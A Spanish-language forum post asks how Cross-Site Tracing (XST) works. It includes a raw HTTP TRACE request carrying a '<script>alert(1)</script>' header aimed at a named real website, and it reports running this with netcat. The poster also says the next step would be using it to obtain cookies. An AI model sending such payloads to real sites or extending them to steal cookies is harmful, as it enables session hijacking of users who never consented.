Alguien sabe algo de este tipo de bug?, o poner algun ejemplillo basico para captar la idea, yo he encontrado este pdf http://www.cgisecurity.com/whitehat-mirror/WH-WhitePaper_XST_ebook.pdf y voy ha empezar a leerlo ya que esta en ingles y me cuesta un poco, y atodo esto ¿porque hay tan poca info sobre este bug?
Bueno ya direis algo un saludo.
EDITO
Un codigo que he encontrado por el web.
Código:
TRACE / HTTP/1.1
Accept: */*
Accept-Language: en-US
UA-CPU: x86
Accept-Encoding: gzip, deflate
If-Modified-Since: Tue, 22 Mar 2005 16:06:25 GMT
If-None-Match: "dd2e7-2c8-42404281"
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; InfoPath.2)
Host: www.schroepl.net
Trace: <script>alert(1)</script>
Proxy-Connection: Keep-Alive
Pragma: no-cache
EDITO 2:
Con el codigo de arriba junto con el nc he podido ejecutar el script, basicamente lo que faltaria seria como poder aprobecharlo para obtener cookies.